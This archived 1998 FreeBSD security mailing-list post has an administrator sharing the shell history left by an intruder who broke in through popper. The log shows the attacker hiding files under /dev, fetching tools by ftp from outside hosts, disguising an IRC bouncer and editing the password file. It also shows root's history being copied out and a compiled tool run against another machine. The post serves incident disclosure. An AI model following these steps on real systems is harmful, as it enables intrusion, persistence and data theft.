Date: Thu, 27 Aug 1998 01:38:37 -0400 (EDT) From: Wilson MacGyver <macgyver@cylatech.com> To: security@FreeBSD.ORG Subject: post breakin log Message-ID: <199808270538.BAA01341@armitage.cylatech.com>
next in thread | raw e-mail | index | archive | help
Hi guys, My FreeBSD box get hacked about two days ago... yes yes, via the popper. I reinstalled the system, but saved the log. I was looking through to see what he has done. There is some stuff you may find interesting... the log from history follows. >From the log, it seem he is very knowledgeable about FreeBSD. though I must admit, I don't get why he makes the /dev/sync. also, I don't know what the deal with the bnc* stuff He installed a backdoor on my system, and then attack a bunch of systems while he was on. He even has a freebsd root kit. :) any suggestion to prevent futher break in is apprecaited. other than "not to run popper" anymore. (grin) has anyone seen some of these programs he ran/install/compile before? Thanks, Mac ---------------------- cd /tmp telnet localhost 110 ls -la mv popper /usr/local/libexec/ telnet localhost 110 rm -rf free* cd /games ls -la cd /dev mkdir sync cd sync ftp worldnetworks.net tar -xvf b.tar rm -rf b.tar cd bnc* make pico bnc.conf mv bnc .. cd .. rm -rf bnc2* vi bnc.conf mv bnc pine pine exit ls cd /usr ld ls cd .. ls cd root ls -la cd .. locate bnc locate irc ls locate tcp.log cd /dev ls tail ptyr tail ptyr1 tail ptyp1 tail ptyq1 uname -a exit ls cd etc pico passwd tail passwd cd usr cd /usr ls cd sup ls ls -la cd src-all ls locate fbsdrootkit.tgz locate fb.tgz locate bnc.conf cd .. cd local ls cd .. ls cd /dev ls -la tail zero tail /root/.bash_history cd /root cp .bash_history h ftp bugs.mc.duke.edu rm h cd /dev cd sync ls tail bnc.conf exit cd /usr/games ls cd hack cd hide ls ls -la ./hack ls cd /dev/sync ls ls -la cd .. tail ptya locate irc irc BitchX cd sync ls tail bnc.conf telnet linuxppc.org telnet irc.686.org telnet irc686.com telnet irc.686.com who telnet onyx.eng.sunysb.edu telnet irc.686.com 90210 telnet declan.bio.columbia.edu telnet sleepy.uncg.edu telnet sleepy.uncg.edu telnet desoto.coosavalley.net telnet 209.16.220.8 telnet ramsis.spd.louisville.edu telnet nuptse.knowledge2000.com telnet ramses.spd.louisville.edu telnet cc607580-a.hwrd1.md.home.com pico tail /root/.bash_history ls uptime cd root ls tail .rhosts tail /etc/hosts.equiv cd /var/named cd var ls cd /var ls telnet STARLIGHT1.DIGITALSTARLIGHT.COM uname -a telnet www.cylatech.com rlogin -l ui8765 www.cylatech.com ls uname -a ftp bugs.mc.duke.edu gcc gcc -o bmb bmb.c ls ./bmb 207.153.39.89 23 ls rm bmb* ls exit To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?199808270538.BAA01341>